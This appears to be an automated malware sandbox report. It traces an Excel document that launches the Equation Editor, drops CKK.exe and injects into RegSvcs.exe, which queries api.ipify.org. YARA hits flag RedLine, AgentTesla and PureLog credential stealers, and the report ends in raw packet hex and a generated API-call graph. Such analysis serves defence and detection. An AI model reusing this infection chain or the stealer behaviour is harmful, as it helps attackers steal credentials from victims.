                                        May 2, 2024 17:39:45.992855072 CEST1289INData Raw: 50 e8 de ea 01 00 83 c4 0c 39 9e 98 01 00 00 75 0b a1 e4 13 4d 00 89 86 98 01 00 00 39 9e a4 01 00 00 75 11 a1 e8 13 4d 00 89 86 a4 01 00 00 89 86 a8 01 00 00 39 9e b0 01 00 00 75 0b a1 ec 13 4d 00 89 86 b0 01 00 00 8d 9e a0 01 00 00 53 8d be 9c
                                        Data Ascii: P9uM9uM9uMSW[Md$$D$F@D$D$D$ qD$$=hMD$PjIhM_^[]U=hMVhL$#)=
                                        May 2, 2024 17:39:45.992876053 CEST1289INData Raw: 89 5f 08 89 5f 0c 89 5f 10 89 5f 14 89 5f 4c 66 89 1f e8 64 2a 00 00 8d 4f 28 e8 7a da ff ff 39 5f 58 0f 87 f6 f6 03 00 8d 4f 50 5f 5b e9 3e da ff ff 50 e8 77 c0 01 00 59 eb b9 55 8b ec 53 8b 5d 08 83 e3 01 f6 45 08 02 56 8b f1 0f 84 e9 f6 03 00
                                        Data Ascii: _____Lfd*O(z9_XOP_[>PwYUS]EVWhA@~7jV&tQWYY_^[]VWj^$MZu MMrZMhZM^ZMTZMJZM@Z_M^4


                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.2249162104.26.12.2054431128C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        TimestampBytes transferredDirectionData
                                        2024-05-02 15:39:49 UTC155OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                        Host: api.ipify.org
                                        Connection: Keep-Alive
                                        2024-05-02 15:39:49 UTC211INHTTP/1.1 200 OK
                                        Date: Thu, 02 May 2024 15:39:49 GMT
                                        Content-Type: text/plain
                                        Content-Length: 14
                                        Connection: close
                                        Vary: Origin
                                        CF-Cache-Status: DYNAMIC
                                        Server: cloudflare
                                        CF-RAY: 87d91b305e0a0fa9-EWR
                                        2024-05-02 15:39:49 UTC14INData Raw: 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35
                                        Data Ascii: 191.96.150.225


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:17:38:55
                                        Start date:02/05/2024
                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                        Imagebase:0x13f650000
                                        File size:28'253'536 bytes
                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:2
                                        Start time:17:39:44
                                        Start date:02/05/2024
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543'304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:17:39:45
                                        Start date:02/05/2024
                                        Path:C:\Users\user\AppData\Roaming\CKK.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\CKK.exe"
                                        Imagebase:0xff330000
                                        File size:1'219'072 bytes
                                        MD5 hash:6DBF70053A37B13C106C623E0934DDFF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.447488825.0000000000140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.447488825.0000000000140000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 39%, ReversingLabs
                                        • Detection: 40%, Virustotal, Browse
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:17:39:46
                                        Start date:02/05/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\CKK.exe"
                                        Imagebase:0xec0000
                                        File size:45'248 bytes
                                        MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.608358959.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000002.608358959.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.608494898.0000000002493000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:false

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:10.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:82.8%
                                          Total number of Nodes:705
                                          Total number of Limit Nodes:70
                                          execution_graph 6545 3590259 6546 3590264 6545->6546 6547 359024b 6546->6547 6596 35902d0 ExitProcess 6546->6596 6549 35902be 6552 3590367 6549->6552 6557 3590341 6549->6557 6560 3590302 6549->6560 6550 359036f 6554 3590372 6550->6554 6555 35903d7 6550->6555 6551 35903d4 6556 35903e8 37 API calls 6551->6556 6687 3590378 6552->6687 6558 359038d CreateFileW 6554->6558 6561 359040f 34 API calls 6555->6561 6556->6555 6557->6550 6557->6551 6559 35903af 44 API calls 6558->6559 6568 359039f 6559->6568 6560->6558 6565 3590398 6560->6565 6566 3590326 6560->6566 6562 35903f5 6561->6562 6563 3590422 6562->6563 6564 3590487 6562->6564 6569 359044e 28 API calls 6563->6569 6585 3590491 6563->6585 6571 35904a8 19 API calls 6564->6571 6564->6585 6567 35903af 44 API calls 6565->6567 6565->6568 6645 3590365 6566->6645 6567->6568 6573 359043c 6569->6573 6570 35904c4 16 API calls 6575 35904ba 6570->6575 6574 359048d 6571->6574 6576 35904e8 6573->6576 6579 3590476 6573->6579 6574->6575 6574->6576 6574->6585 6577 359054f 6575->6577 6578 35904bf 6575->6578 6582 3590542 WriteFile 6575->6582 6584 3590557 6575->6584 6580 3590502 10 API calls 6576->6580 6581 3590563 7 API calls 6577->6581 6583 35904a8 19 API calls 6579->6583 6580->6575 6581->6584 6582->6575 6583->6585 6586 3590580 5 API calls 6584->6586 6585->6570 6585->6575 6588 3590570 6586->6588 6587 35905d1 6589 35905e0 ExitProcess 6587->6589 6595 3590618 6587->6595 6588->6587 6590 35905a1 3 API calls 6588->6590 6591 35905ea 6588->6591 6592 3590592 6590->6592 6592->6591 6593 35905a0 CreateProcessW 6592->6593 6594 35905dd ExitProcess 6593->6594 6594->6587 6692 35902e9 6596->6692 6598 35902dc 6601 3590367 6598->6601 6606 3590341 6598->6606 6609 3590302 6598->6609 6599 359036f 6603 3590372 6599->6603 6604 35903d7 6599->6604 6600 35903d4 6605 35903e8 37 API calls 6600->6605 6602 3590378 45 API calls 6601->6602 6602->6606 6607 359038d CreateFileW 6603->6607 6610 359040f 34 API calls 6604->6610 6605->6604 6606->6599 6606->6600 6608 35903af 44 API calls 6607->6608 6617 359039f 6608->6617 6609->6607 6614 3590398 6609->6614 6615 3590326 6609->6615 6611 35903f5 6610->6611 6612 3590422 6611->6612 6613 3590487 6611->6613 6618 359044e 28 API calls 6612->6618 6634 3590491 6612->6634 6620 35904a8 19 API calls 6613->6620 6613->6634 6616 35903af 44 API calls 6614->6616 6614->6617 6621 3590365 49 API calls 6615->6621 6616->6617 6622 359043c 6618->6622 6619 35904c4 16 API calls 6624 35904ba 6619->6624 6623 359048d 6620->6623 6621->6606 6625 35904e8 6622->6625 6628 3590476 6622->6628 6623->6624 6623->6625 6623->6634 6626 359054f 6624->6626 6627 35904bf 6624->6627 6631 3590542 WriteFile 6624->6631 6633 3590557 6624->6633 6629 3590502 10 API calls 6625->6629 6630 3590563 7 API calls 6626->6630 6627->6549 6632 35904a8 19 API calls 6628->6632 6629->6624 6630->6633 6631->6624 6632->6634 6635 3590580 5 API calls 6633->6635 6634->6619 6634->6624 6637 3590570 6635->6637 6636 35905d1 6638 35905e0 ExitProcess 6636->6638 6644 3590618 6636->6644 6637->6636 6639 35905a1 3 API calls 6637->6639 6640 35905ea 6637->6640 6641 3590592 6639->6641 6640->6549 6641->6640 6642 35905a0 CreateProcessW 6641->6642 6643 35905dd ExitProcess 6642->6643 6643->6636 6644->6549 6646 3590367 6645->6646 6647 3590378 45 API calls 6646->6647 6648 359036c 6647->6648 6649 359036f 6648->6649 6650 35903d4 6648->6650 6651 3590372 CreateFileW 6649->6651 6652 35903d7 6649->6652 6653 35903e8 37 API calls 6650->6653 6655 35903af 44 API calls 6651->6655 6656 359040f 34 API calls 6652->6656 6653->6652 6660 359039f 6655->6660 6657 35903f5 6656->6657 6658 3590422 6657->6658 6659 3590487 6657->6659 6661 359044e 28 API calls 6658->6661 6676 3590491 6658->6676 6663 35904a8 19 API calls 6659->6663 6659->6676 6664 359043c 6661->6664 6662 35904c4 16 API calls 6666 35904ba 6662->6666 6665 359048d 6663->6665 6667 35904e8 6664->6667 6670 3590476 6664->6670 6665->6666 6665->6667 6665->6676 6668 359054f 6666->6668 6669 35904bf 6666->6669 6673 3590542 WriteFile 6666->6673 6675 3590557 6666->6675 6671 3590502 10 API calls 6667->6671 6672 3590563 7 API calls 6668->6672 6669->6557 6674 35904a8 19 API calls 6670->6674 6671->6666 6672->6675 6673->6666 6674->6676 6677 3590580 5 API calls 6675->6677 6676->6662 6676->6666 6678 3590570 6677->6678 6680 35905a1 3 API calls 6678->6680 6681 35905ea 6678->6681 6685 35905d1 6678->6685 6679 35905e0 ExitProcess 6682 3590592 6680->6682 6681->6557 6682->6681 6683 35905a0 CreateProcessW 6682->6683 6684 35905dd ExitProcess 6683->6684 6684->6685 6685->6679 6686 3590618 6685->6686 6686->6557 6688 359037b CreateFileW 6687->6688 6690 35903af 44 API calls 6688->6690 6691 359039f 6690->6691 6693 35902ef 6692->6693 6742 3590305 6693->6742 6695 35902f6 6698 3590367 6695->6698 6703 3590341 6695->6703 6706 3590302 6695->6706 6696 359036f 6700 3590372 6696->6700 6701 35903d7 6696->6701 6697 35903d4 6702 35903e8 37 API calls 6697->6702 6699 3590378 45 API calls 6698->6699 6699->6703 6704 359038d CreateFileW 6700->6704 6707 359040f 34 API calls 6701->6707 6702->6701 6703->6696 6703->6697 6705 35903af 44 API calls 6704->6705 6714 359039f 6705->6714 6706->6704 6711 3590398 6706->6711 6712 3590326 6706->6712 6708 35903f5 6707->6708 6709 3590422 6708->6709 6710 3590487 6708->6710 6715 359044e 28 API calls 6709->6715 6731 3590491 6709->6731 6717 35904a8 19 API calls 6710->6717 6710->6731 6713 35903af 44 API calls 6711->6713 6711->6714 6718 3590365 49 API calls 6712->6718 6713->6714 6719 359043c 6715->6719 6716 35904c4 16 API calls 6721 35904ba 6716->6721 6720 359048d 6717->6720 6718->6703 6722 35904e8 6719->6722 6725 3590476 6719->6725 6720->6721 6720->6722 6720->6731 6723 359054f 6721->6723 6724 35904bf 6721->6724 6728 3590542 WriteFile 6721->6728 6730 3590557 6721->6730 6726 3590502 10 API calls 6722->6726 6727 3590563 7 API calls 6723->6727 6724->6598 6729 35904a8 19 API calls 6725->6729 6726->6721 6727->6730 6728->6721 6729->6731 6732 3590580 5 API calls 6730->6732 6731->6716 6731->6721 6733 3590570 6732->6733 6735 35905a1 3 API calls 6733->6735 6736 35905ea 6733->6736 6740 35905d1 6733->6740 6734 35905e0 ExitProcess 6737 3590592 6735->6737 6736->6598 6737->6736 6738 35905a0 CreateProcessW 6737->6738 6739 35905dd ExitProcess 6738->6739 6739->6740 6740->6734 6741 3590618 6740->6741 6741->6598 6743 359030b 6742->6743 6789 359032c 6743->6789 6745 359038d CreateFileW 6747 35903af 44 API calls 6745->6747 6746 3590312 6746->6745 6748 3590398 6746->6748 6749 3590326 6746->6749 6752 359039f 6747->6752 6750 35903af 44 API calls 6748->6750 6748->6752 6751 3590365 49 API calls 6749->6751 6750->6752 6753 3590341 6751->6753 6754 359036f 6753->6754 6755 35903d4 6753->6755 6756 3590372 6754->6756 6757 35903d7 6754->6757 6758 35903e8 37 API calls 6755->6758 6756->6745 6759 359040f 34 API calls 6757->6759 6758->6757 6760 35903f5 6759->6760 6761 3590422 6760->6761 6762 3590487 6760->6762 6763 359044e 28 API calls 6761->6763 6778 3590491 6761->6778 6765 35904a8 19 API calls 6762->6765 6762->6778 6766 359043c 6763->6766 6764 35904c4 16 API calls 6768 35904ba 6764->6768 6767 359048d 6765->6767 6769 35904e8 6766->6769 6772 3590476 6766->6772 6767->6768 6767->6769 6767->6778 6770 359054f 6768->6770 6771 35904bf 6768->6771 6775 3590542 WriteFile 6768->6775 6777 3590557 6768->6777 6773 3590502 10 API calls 6769->6773 6774 3590563 7 API calls 6770->6774 6771->6695 6776 35904a8 19 API calls 6772->6776 6773->6768 6774->6777 6775->6768 6776->6778 6779 3590580 5 API calls 6777->6779 6778->6764 6778->6768 6780 3590570 6779->6780 6782 35905a1 3 API calls 6780->6782 6783 35905ea 6780->6783 6787 35905d1 6780->6787 6781 35905e0 ExitProcess 6784 3590592 6782->6784 6783->6695 6784->6783 6785 35905a0 CreateProcessW 6784->6785 6786 35905dd ExitProcess 6785->6786 6786->6787 6787->6781 6788 3590618 6787->6788 6788->6695 6790 359032f 6789->6790 6791 3590365 49 API calls 6790->6791 6792 3590341 6791->6792 6793 359036f 6792->6793 6794 35903d4 6792->6794 6795 3590372 CreateFileW 6793->6795 6796 35903d7 6793->6796 6797 35903e8 37 API calls 6794->6797 6799 35903af 44 API calls 6795->6799 6800 359040f 34 API calls 6796->6800 6797->6796 6804 359039f 6799->6804 6801 35903f5 6800->6801 6802 3590422 6801->6802 6803 3590487 6801->6803 6805 359044e 28 API calls 6802->6805 6820 3590491 6802->6820 6807 35904a8 19 API calls 6803->6807 6803->6820 6808 359043c 6805->6808 6806 35904c4 16 API calls 6810 35904ba 6806->6810 6809 359048d 6807->6809 6811 35904e8 6808->6811 6814 3590476 6808->6814 6809->6810 6809->6811 6809->6820 6812 359054f 6810->6812 6813 35904bf 6810->6813 6817 3590542 WriteFile 6810->6817 6819 3590557 6810->6819 6815 3590502 10 API calls 6811->6815 6816 3590563 7 API calls 6812->6816 6813->6746 6818 35904a8 19 API calls 6814->6818 6815->6810 6816->6819 6817->6810 6818->6820 6821 3590580 5 API calls 6819->6821 6820->6806 6820->6810 6822 3590570 6821->6822 6824 35905a1 3 API calls 6822->6824 6825 35905ea 6822->6825 6829 35905d1 6822->6829 6823 35905e0 ExitProcess 6826 3590592 6824->6826 6825->6746 6826->6825 6827 35905a0 CreateProcessW 6826->6827 6828 35905dd ExitProcess 6827->6828 6828->6829 6829->6823 6830 3590618 6829->6830 6830->6746 7181 3590054 7183 3590083 7181->7183 7184 35900ab 7183->7184 7185 3590064 7184->7185 7186 35902be 7185->7186 7187 35902d0 66 API calls 7185->7187 7190 3590367 7186->7190 7195 3590341 7186->7195 7198 3590302 7186->7198 7187->7186 7188 359036f 7192 3590372 7188->7192 7193 35903d7 7188->7193 7189 35903d4 7194 35903e8 37 API calls 7189->7194 7191 3590378 45 API calls 7190->7191 7191->7195 7196 359038d CreateFileW 7192->7196 7199 359040f 34 API calls 7193->7199 7194->7193 7195->7188 7195->7189 7197 35903af 44 API calls 7196->7197 7201 359039f 7197->7201 7198->7196 7203 3590398 7198->7203 7206 3590326 7198->7206 7200 35903f5 7199->7200 7202 3590422 7200->7202 7205 3590487 7200->7205 7207 359044e 28 API calls 7202->7207 7208 3590491 7202->7208 7203->7201 7204 35903af 44 API calls 7203->7204 7204->7201 7205->7208 7210 35904a8 19 API calls 7205->7210 7211 3590365 49 API calls 7206->7211 7212 359043c 7207->7212 7209 35904c4 16 API calls 7208->7209 7220 35904ba 7208->7220 7209->7220 7213 359048d 7210->7213 7211->7195 7214 35904e8 7212->7214 7217 3590476 7212->7217 7213->7208 7213->7214 7213->7220 7218 3590502 10 API calls 7214->7218 7215 359054f 7219 3590563 7 API calls 7215->7219 7216 35904bf 7216->7183 7222 35904a8 19 API calls 7217->7222 7218->7220 7223 3590557 7219->7223 7220->7215 7220->7216 7221 3590542 WriteFile 7220->7221 7220->7223 7221->7220 7222->7208 7224 3590580 5 API calls 7223->7224 7225 3590570 7224->7225 7227 35905a1 3 API calls 7225->7227 7228 35905ea 7225->7228 7232 35905d1 7225->7232 7226 35905e0 ExitProcess 7229 3590592 7227->7229 7228->7183 7229->7228 7230 35905a0 CreateProcessW 7229->7230 7231 35905dd ExitProcess 7230->7231 7231->7232 7232->7226 7233 3590618 7232->7233 7233->7183 6204 3590378 6205 359037b CreateFileW 6204->6205 6209 35903af LoadLibraryW 6205->6209 6208 359039f 6244 35903c4 6209->6244 6211 3590422 6217 3590491 6211->6217 6342 359044e 6211->6342 6213 35903b8 6213->6211 6278 35903e8 6213->6278 6214 359043c 6219 35904e8 6214->6219 6221 3590476 6214->6221 6216 35903d9 6310 359040f 6216->6310 6218 35904ba 6217->6218 6404 35904c4 6217->6404 6220 359054f 6218->6220 6229 3590557 6218->6229 6230 35904bf 6218->6230 6231 3590542 WriteFile 6218->6231 6424 3590502 6219->6424 6440 3590563 6220->6440 6228 35904a8 19 API calls 6221->6228 6225 35903f5 6225->6211 6227 3590487 6225->6227 6227->6217 6367 35904a8 6227->6367 6228->6217 6386 3590580 6229->6386 6230->6208 6231->6218 6234 359048d 6234->6217 6234->6218 6234->6219 6235 35905d1 6237 35905e0 ExitProcess 6235->6237 6243 3590618 6235->6243 6236 3590570 6236->6235 6239 35905ea 6236->6239 6396 35905a1 6236->6396 6239->6208 6241 35905a0 CreateProcessW 6402 35905dd 6241->6402 6243->6208 6245 35903c7 6244->6245 6246 35903e8 37 API calls 6245->6246 6247 35903d9 6246->6247 6248 359040f 34 API calls 6247->6248 6249 35903f5 6248->6249 6250 3590422 6249->6250 6251 3590487 6249->6251 6252 3590491 6250->6252 6253 359044e 28 API calls 6250->6253 6251->6252 6255 35904a8 19 API calls 6251->6255 6254 35904c4 16 API calls 6252->6254 6264 35904ba 6252->6264 6256 359043c 6253->6256 6254->6264 6257 359048d 6255->6257 6258 35904e8 6256->6258 6261 3590476 6256->6261 6257->6252 6257->6258 6257->6264 6262 3590502 10 API calls 6258->6262 6259 359054f 6263 3590563 7 API calls 6259->6263 6260 35904bf 6260->6213 6267 35904a8 19 API calls 6261->6267 6262->6264 6265 3590557 6263->6265 6264->6259 6264->6260 6264->6265 6266 3590542 WriteFile 6264->6266 6268 3590580 5 API calls 6265->6268 6266->6264 6267->6252 6270 3590570 6268->6270 6269 35905d1 6271 35905e0 ExitProcess 6269->6271 6277 3590618 6269->6277 6270->6269 6272 35905a1 3 API calls 6270->6272 6273 35905ea 6270->6273 6274 3590592 6272->6274 6273->6213 6274->6273 6275 35905a0 CreateProcessW 6274->6275 6276 35905dd ExitProcess 6275->6276 6276->6269 6277->6213 6279 35903eb 6278->6279 6280 359040f 34 API calls 6279->6280 6281 35903f5 6280->6281 6282 3590422 6281->6282 6283 3590487 6281->6283 6284 359044e 28 API calls 6282->6284 6299 3590491 6282->6299 6286 35904a8 19 API calls 6283->6286 6283->6299 6287 359043c 6284->6287 6285 35904c4 16 API calls 6289 35904ba 6285->6289 6288 359048d 6286->6288 6290 35904e8 6287->6290 6293 3590476 6287->6293 6288->6289 6288->6290 6288->6299 6291 359054f 6289->6291 6292 35904bf 6289->6292 6296 3590542 WriteFile 6289->6296 6298 3590557 6289->6298 6294 3590502 10 API calls 6290->6294 6295 3590563 7 API calls 6291->6295 6292->6216 6297 35904a8 19 API calls 6293->6297 6294->6289 6295->6298 6296->6289 6297->6299 6300 3590580 5 API calls 6298->6300 6299->6285 6299->6289 6301 3590570 6300->6301 6303 35905a1 3 API calls 6301->6303 6304 35905ea 6301->6304 6308 35905d1 6301->6308 6302 35905e0 ExitProcess 6305 3590592 6303->6305 6304->6216 6305->6304 6306 35905a0 CreateProcessW 6305->6306 6307 35905dd ExitProcess 6306->6307 6307->6308 6308->6302 6309 3590618 6308->6309 6309->6216 6311 3590412 6310->6311 6452 359042b 6311->6452 6313 3590418 6314 3590422 6313->6314 6315 3590487 6313->6315 6316 359044e 28 API calls 6314->6316 6331 3590491 6314->6331 6318 35904a8 19 API calls 6315->6318 6315->6331 6319 359043c 6316->6319 6317 35904c4 16 API calls 6321 35904ba 6317->6321 6320 359048d 6318->6320 6322 35904e8 6319->6322 6325 3590476 6319->6325 6320->6321 6320->6322 6320->6331 6323 359054f 6321->6323 6324 35904bf 6321->6324 6328 3590542 WriteFile 6321->6328 6330 3590557 6321->6330 6326 3590502 10 API calls 6322->6326 6327 3590563 7 API calls 6323->6327 6324->6225 6329 35904a8 19 API calls 6325->6329 6326->6321 6327->6330 6328->6321 6329->6331 6332 3590580 5 API calls 6330->6332 6331->6317 6331->6321 6334 3590570 6332->6334 6333 35905d1 6335 35905e0 ExitProcess 6333->6335 6341 3590618 6333->6341 6334->6333 6336 35905a1 3 API calls 6334->6336 6337 35905ea 6334->6337 6338 3590592 6336->6338 6337->6225 6338->6337 6339 35905a0 CreateProcessW 6338->6339 6340 35905dd ExitProcess 6339->6340 6340->6333 6341->6225 6478 359045b 6342->6478 6344 3590453 6345 35904e8 6344->6345 6346 3590476 6344->6346 6347 3590502 10 API calls 6345->6347 6348 35904a8 19 API calls 6346->6348 6357 35904ba 6347->6357 6351 3590491 6348->6351 6349 3590580 5 API calls 6356 3590570 6349->6356 6350 359054f 6353 3590563 7 API calls 6350->6353 6352 35904c4 16 API calls 6351->6352 6351->6357 6352->6357 6355 3590557 6353->6355 6354 35905d1 6359 35905e0 ExitProcess 6354->6359 6366 3590618 6354->6366 6355->6349 6356->6354 6361 35905a1 3 API calls 6356->6361 6362 35905ea 6356->6362 6357->6350 6357->6355 6358 35904bf 6357->6358 6360 3590542 WriteFile 6357->6360 6358->6214 6360->6357 6363 3590592 6361->6363 6362->6214 6363->6362 6364 35905a0 CreateProcessW 6363->6364 6365 35905dd ExitProcess 6364->6365 6365->6354 6366->6214 6368 35904ab 6367->6368 6369 35904c4 16 API calls 6368->6369 6372 35904ba 6369->6372 6370 35904bf 6370->6234 6371 3590542 WriteFile 6371->6372 6372->6370 6372->6371 6373 359054f 6372->6373 6374 3590563 7 API calls 6373->6374 6375 3590557 6374->6375 6376 3590580 5 API calls 6375->6376 6377 3590570 6376->6377 6379 35905a1 3 API calls 6377->6379 6380 35905ea 6377->6380 6384 35905d1 6377->6384 6378 35905e0 ExitProcess 6381 3590592 6379->6381 6380->6234 6381->6380 6382 35905a0 CreateProcessW 6381->6382 6383 35905dd ExitProcess 6382->6383 6383->6384 6384->6378 6385 3590618 6384->6385 6385->6234 6387 3590583 6386->6387 6388 35905a1 3 API calls 6387->6388 6389 3590592 6388->6389 6390 35905f2 6389->6390 6391 35905a0 CreateProcessW 6389->6391 6390->6236 6392 35905dd ExitProcess 6391->6392 6393 35905d1 6392->6393 6394 3590618 6393->6394 6395 35905e0 ExitProcess 6393->6395 6394->6236 6397 35905a4 CreateProcessW 6396->6397 6398 35905dd ExitProcess 6397->6398 6399 35905d1 6397->6399 6398->6399 6400 3590592 6399->6400 6401 35905e0 ExitProcess 6399->6401 6400->6239 6400->6241 6403 35905e0 ExitProcess 6402->6403 6405 35904c7 6404->6405 6525 35904e8 6405->6525 6407 3590542 WriteFile 6411 35904f2 6407->6411 6408 35904ce 6408->6407 6409 3590502 10 API calls 6408->6409 6410 3590553 6408->6410 6408->6411 6409->6411 6412 3590580 5 API calls 6410->6412 6411->6407 6411->6410 6413 359054f 6411->6413 6415 3590570 6412->6415 6414 3590563 7 API calls 6413->6414 6414->6410 6417 35905a1 3 API calls 6415->6417 6418 35905ea 6415->6418 6422 35905d1 6415->6422 6416 35905e0 ExitProcess 6419 3590592 6417->6419 6418->6218 6419->6418 6420 35905a0 CreateProcessW 6419->6420 6421 35905dd ExitProcess 6420->6421 6421->6422 6422->6416 6423 3590618 6422->6423 6423->6218 6427 3590505 6424->6427 6425 359054f 6426 3590563 7 API calls 6425->6426 6429 3590557 6426->6429 6427->6425 6428 3590542 WriteFile 6427->6428 6428->6427 6430 3590580 5 API calls 6429->6430 6432 3590570 6430->6432 6431 35905d1 6433 35905e0 ExitProcess 6431->6433 6439 3590618 6431->6439 6432->6431 6434 35905a1 3 API calls 6432->6434 6435 35905ea 6432->6435 6436 3590592 6434->6436 6435->6218 6436->6435 6437 35905a0 CreateProcessW 6436->6437 6438 35905dd ExitProcess 6437->6438 6438->6431 6439->6218 6441 3590566 6440->6441 6442 3590580 5 API calls 6441->6442 6444 3590570 6442->6444 6443 35905e0 ExitProcess 6445 35905a1 3 API calls 6444->6445 6446 35905ea 6444->6446 6450 35905d1 6444->6450 6447 3590592 6445->6447 6446->6229 6447->6446 6448 35905a0 CreateProcessW 6447->6448 6449 35905dd ExitProcess 6448->6449 6449->6450 6450->6443 6451 3590618 6450->6451 6451->6229 6453 359042e 6452->6453 6454 359043c 6453->6454 6455 359044e 28 API calls 6453->6455 6456 35904e8 6454->6456 6457 3590476 6454->6457 6455->6454 6458 3590502 10 API calls 6456->6458 6459 35904a8 19 API calls 6457->6459 6460 35904ba 6458->6460 6461 3590491 6459->6461 6462 3590557 6460->6462 6464 359054f 6460->6464 6469 35904bf 6460->6469 6471 3590542 WriteFile 6460->6471 6461->6460 6465 35904c4 16 API calls 6461->6465 6463 3590580 5 API calls 6462->6463 6468 3590570 6463->6468 6466 3590563 7 API calls 6464->6466 6465->6460 6466->6462 6467 35905d1 6470 35905e0 ExitProcess 6467->6470 6477 3590618 6467->6477 6468->6467 6472 35905a1 3 API calls 6468->6472 6473 35905ea 6468->6473 6469->6313 6471->6460 6474 3590592 6472->6474 6473->6313 6474->6473 6475 35905a0 CreateProcessW 6474->6475 6476 35905dd ExitProcess 6475->6476 6476->6467 6477->6313 6479 359045e 6478->6479 6504 3590477 6479->6504 6481 3590464 6482 35904e8 6481->6482 6483 3590476 6481->6483 6484 3590502 10 API calls 